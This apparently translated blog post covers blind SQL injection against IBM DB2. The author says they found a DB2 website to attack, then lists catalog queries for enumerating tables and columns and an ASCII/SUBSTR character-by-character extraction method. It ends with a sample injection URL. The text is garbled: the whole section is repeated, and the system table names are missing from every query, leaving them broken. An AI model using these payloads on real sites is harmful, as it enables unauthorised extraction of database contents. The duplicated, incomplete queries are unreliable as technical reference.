Fewer people use DB2. Today I came across a DB2 website for injection and wanted to try my skills. However, it is difficult to find relevant information online, so I had to study it myself.
Referring to the IBM DB2 documentation, we summarized several items like this:
1、select NAME from where CREATOR =USER
You can return the table (table) names created by all users in the system.
2、select NAME from where TBCREATOR = '' and TBNAME=''
Return the column name in the table
3、select NAME from where CREATOR =USER FETCH FIRST 1 ROWS ONLY
This is the most critical point, returning the first record, similar to top 1 in sql server
4、SUBSTR(string, position, length)
Functions that return string substrings, similar to mid
5. There is no need to say more about ASCII().
With these statements and functions, we can easily guess all table names, field names, and data in them using the Ascii half-disassembly method.
For example, determine whether the ascii code of the first character of the first table name is greater than 50:
http://*.com??id=1 and (select ASCII(SUBSTR(NAME,1,1)) from where CREATOR =USER FETCH FIRST 1 ROWS ONLY)>50 --
/?logID=543
Referring to the IBM DB2 documentation, we summarized several items like this:
1、select NAME from where CREATOR =USER
You can return the table (table) names created by all users in the system.
2、select NAME from where TBCREATOR = '' and TBNAME=''
Return the column name in the table
3、select NAME from where CREATOR =USER FETCH FIRST 1 ROWS ONLY
This is the most critical point, returning the first record, similar to top 1 in sql server
4、SUBSTR(string, position, length)
Functions that return string substrings, similar to mid
5. There is no need to say more about ASCII().
With these statements and functions, we can easily guess all table names, field names, and data in them using the Ascii half-disassembly method.
For example, determine whether the ascii code of the first character of the first table name is greater than 50:
http://*.com??id=1 and (select ASCII(SUBSTR(NAME,1,1)) from where CREATOR =USER FETCH FIRST 1 ROWS ONLY)>50 --
/?logID=543